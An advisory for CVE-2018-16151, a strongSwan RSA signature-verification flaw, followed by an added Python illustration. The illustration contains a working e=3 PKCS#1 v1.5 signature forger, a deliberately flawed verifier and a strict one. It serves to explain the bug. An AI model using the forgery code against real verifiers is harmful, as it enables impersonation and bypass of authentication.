In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Because the verifier accepts a DigestInfo whose parameters field holds arbitrary bytes instead of requiring the single valid encoding, an attacker gains a run of free bytes inside the padded block; when a small public exponent (such as e = 3) is in use, those free bytes make it feasible to compute a signature value whose cube carries the expected padding, algorithm identifier and message digest at their fixed positions, so a remote attacker can forge signatures without the private key. This could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
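Worked illustration of the flaw class described above, added here as an editorial example: it is not strongSwan's code, and verify_lenient() is a simplified model of a DigestInfo parser that never inspects digestAlgorithm.parameters, not the gmp plugin's parser. The modulus N is a constructed stand-in (any odd 2048-bit value with the top bit set behaves identically, because the forged s satisfies s^3 < N and nothing wraps), and the message is constructed. With e = 3 the attacker builds the padded block so that its fixed high bytes (padding, DER headers, SHA-256 OID) and fixed low bytes (the digest OCTET STRING) are the top and bottom of a perfect cube, letting the bytes declared as the parameters blob absorb everything in between (Bleichenbacher's 2006 attack used trailing junk; the free-bytes-in-the-middle form is the Kühn, Pyshkin, Tews and Weinmann 2008 variant). verify_strict() rebuilds the only valid encoding and compares the whole block, as RFC 8017 section 8.2.2 does, and rejects the same signature.

```python
"""Added illustration, not strongSwan code: e = 3 PKCS#1 v1.5 forgery against a
verifier that parses DigestInfo and ignores digestAlgorithm.parameters.  The
lenient verifier is a simplified model of the flaw, not the gmp plugin's parser."""
import hashlib

SHA256_ALG_OID = bytes.fromhex("0609608648016503040201")  # DER OID TLV for id-sha256
E, K = 3, 256                                               # small exponent, 2048-bit modulus
# Constructed stand-in modulus (not a real key): the forgery never wraps mod n, so any
# odd 2048-bit value with the top bit set behaves like a real public key here.
N = int.from_bytes(hashlib.sha256(b"stand-in modulus").digest() * 8, "big") | (1 << 2047) | 1


def der_len(n):
    """DER length: short form, or 0x81/0x82 long forms for n < 65536."""
    return bytes([n]) if n < 0x80 else bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF])


def der_tlv(tag, content):
    return bytes([tag]) + der_len(len(content)) + content


def der_read(buf):
    """Split one DER element off buf: (tag, value, remaining bytes)."""
    if len(buf) < 2:
        raise ValueError("short DER")
    tag, ln, pos = buf[0], buf[1], 2
    if ln & 0x80:
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[2:2 + nb], "big"), 2 + nb
    if pos + ln > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + ln], buf[pos + ln:]


def em_of(sig, n, e):
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(K, "big")


def verify_strict(msg, sig, n=N, e=E):
    """RFC 8017 8.2.2 style: rebuild the only valid EM and compare the whole block."""
    alg = der_tlv(0x30, SHA256_ALG_OID + b"\x05\x00")       # parameters = DER NULL
    t = der_tlv(0x30, alg + der_tlv(0x04, hashlib.sha256(msg).digest()))
    return em_of(sig, n, e) == b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t


def verify_lenient(msg, sig, n=N, e=E):
    """Parsing verifier with the CVE-2018-16151 class of bug: parameters are never checked."""
    em = em_of(sig, n, e)
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x01" or sep < 10 or any(b != 0xFF for b in em[2:sep]):
        return False                                           # bad header or fewer than 8 bytes of PS
    try:
        tag, di, rest = der_read(em[sep + 1:])
        if tag != 0x30 or rest:                                # trailing bytes after DigestInfo are rejected
            return False
        tag, alg, rest = der_read(di)
        oid_tag, oid, params = der_read(alg)
        if tag != 0x30 or oid_tag != 0x06 or oid != SHA256_ALG_OID[2:]:
            return False
        # BUG: `params` is ignored; a correct verifier requires it absent or exactly 05 00.
        tag, digest, rest = der_read(rest)
    except ValueError:
        return False
    return tag == 0x04 and not rest and digest == hashlib.sha256(msg).digest()


def icbrt_ceil(v):
    x = 1 << ((v.bit_length() + 2) // 3)                       # upper bound on cbrt(v)
    while True:                                                # integer Newton, descends to floor(cbrt v)
        y = (2 * x + v // (x * x)) // 3
        if y >= x:
            break
        x = y
    return x if x ** 3 >= v else x + 1


def forge(msg, n=N, k=K):
    """Forge an e=3 signature accepted by verify_lenient: fix the low bytes with a cube
    root mod 2^m, fix the high bytes with an integer cube root, let the junk in the
    parameters blob absorb the cross terms in between."""
    tail = der_tlv(0x04, hashlib.sha256(msg).digest())         # OCTET STRING digest = low 34 bytes of EM
    if tail[-1] % 2 == 0:
        raise ValueError("digest must end in an odd byte (cube roots mod 2^m exist only for odd residues)")
    free = k - 11 - 3 - 3 - len(SHA256_ALG_OID) - 3 - len(tail)  # bytes the parameters blob can hold (191)
    params_hdr = b"\x04" + der_len(free)                       # OCTET STRING that will carry the junk
    alg_hdr = b"\x30" + der_len(len(SHA256_ALG_OID) + len(params_hdr) + free)
    di_hdr = b"\x30" + der_len(len(alg_hdr) + len(SHA256_ALG_OID) + len(params_hdr) + free + len(tail))
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + di_hdr + alg_hdr + SHA256_ALG_OID + params_hdr
    assert len(prefix) + free + len(tail) == k
    m = 8 * len(tail)
    d = int.from_bytes(tail, "big")
    s_low = pow(d, pow(3, -1, 1 << (m - 1)), 1 << m)           # s_low^3 == d (mod 2^m)
    s0 = icbrt_ceil(int.from_bytes(prefix, "big") << (8 * (free + len(tail))))
    s = (((s0 >> m) + 1) << m) + s_low                         # high bits from s0, low bits from s_low
    em = (s ** 3).to_bytes(k, "big")                           # s^3 < n, so this is exactly what the verifier sees
    if em[:len(prefix)] != prefix or em[-len(tail):] != tail:
        raise RuntimeError("free region too small to absorb the cube's cross terms")
    return s.to_bytes(k, "big")


def forgeable_message(base):
    """Attacker-chosen message whose SHA-256 ends in an odd byte (half of all messages do)."""
    for i in range(256):
        msg = base + str(i).encode()
        if hashlib.sha256(msg).digest()[-1] & 1:
            return msg
```

forge() refuses a digest whose last byte is even, since a cube root modulo 2^m exists only for odd residues; an attacker simply varies the bits of the signed data they control until it is odd, which forgeable_message() models. The final check in forge() raises instead of returning a bad value when the free region cannot absorb the cube's cross terms, which is the case for shorter moduli with this layout; with a 2048-bit modulus the 191 free bytes leave a wide margin.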
Name | Vendor | Start Version | End Version |
---|---|---|---|
Strongswan | Strongswan | 4.0.0 (including) | 4.6.4 (including) |
Strongswan | Strongswan | 5.0.0 (including) | 5.7.0 (excluding) |
Strongswan | Ubuntu | bionic | * |
Strongswan | Ubuntu | devel | * |
Strongswan | Ubuntu | trusty | * |
Strongswan | Ubuntu | xenial | * |